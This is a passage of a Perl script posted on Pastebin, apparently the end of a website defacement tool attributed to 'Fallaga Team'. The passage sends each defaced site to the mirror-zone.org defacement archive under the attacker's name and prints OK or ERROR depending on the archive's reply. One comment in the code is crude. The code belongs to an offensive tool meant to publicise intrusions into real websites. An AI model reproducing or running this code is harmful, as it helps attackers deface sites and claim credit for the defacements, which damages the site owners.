  1790. $mz = "http://mirror-zone.org/notify/singel.php";
  1791. $fgtn="Fallaga Team"; # u can change it by ur name on mirror zone and plz madafaking bitchs dont call this recode lol !
  1792. $mzp = POST $mz, [hacker => $fgtn, text => $def];
  1793. $response = $ua->request($mzp);
  1794. if ($response->content =~ /Deface Add successfully added to Archive .../) {
  1795. print " .................... ";
  1796. print color('bold white');
  1797. print "[";
  1798. print color('reset');
  1799. print color('bold green');
  1800. print "OK";
  1801. print color('reset');
  1802. print color('bold white');
  1803. print "] \n";
  1804. print color('reset');
  1805. }else {
  1806. print " ................. ";
  1807. print color('bold white');
  1808. print "[";
  1809. print color('reset');
  1810. print color('bold red');
  1811. print "ERROR";
  1812. print color('reset');
  1813. print color('bold white');
  1814. print "] \n";
  1815. print color('reset');
  1816. }
  1817. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!